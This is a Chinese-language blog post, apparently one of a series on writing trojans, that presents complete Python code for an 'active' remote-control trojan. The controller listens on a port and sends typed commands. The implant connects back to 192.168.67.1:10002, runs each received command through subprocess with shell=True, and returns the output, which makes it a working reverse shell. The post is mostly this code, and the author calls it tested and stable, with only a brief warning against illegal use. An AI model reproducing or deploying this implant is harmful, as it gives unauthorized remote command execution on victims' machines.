前两篇文章的木马太被动,今天是通过socket和os来进行主动木马编写
有些s13,我真的搞不懂拿一些没过脑子的代码就放到网上去害人,骗流量,还某知名安全企业学院写的,真的服。我的代码自己运行过,很稳,各位慎重,勿做非法之事
因为是木马入门,所以前几篇比较简单,也只是一个模块搭建,后期我会逐步搭建框架,一周我也只会出两三篇来记录自己的编写历程,所以大佬们亲喷
首先当然是控制端
1 from socket import * 2 import os 3 import time 4 import subprocess 5 6 target = "192.168.67.1" 7 port = 10002 8 addr = (target,port) 9 buff = 1024 10 tcpSock = socket(AF_INET, SOCK_STREAM) 11 tcpSock.bind(addr) 12 tcpSock.listen(5) 13 14 while True: 15 conn,addr=tcpSock.accept() 16 while True: 17 data = input("input the command:\n") 18 conn.send(bytes(data,encoding="utf-8")) 19 getdata = str(conn.recv(buff),encoding="utf-8") 20 if not getdata: 21 break 22 print(getdata) 23 tcpSock.close()
再就是被控端
1 import socket 2 import os 3 import subprocess 4 target = "192.168.67.1" 5 port = 10002 6 addr = (target,port) 7 buff = 1024 8 9 cli = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 cli.connect(addr) 11 12 while True: 13 data = str(cli.recv(buff),encoding="utf-8") 14 if not data: 15 break 16 print(data) 17 f =subprocess.Popen(data,shell=True, stdout=subprocess.PIPE).stdout 18 redata = bytes(str(f.read()),encoding="utf-8") 19 cli.sendall(redata) 20 cli.close()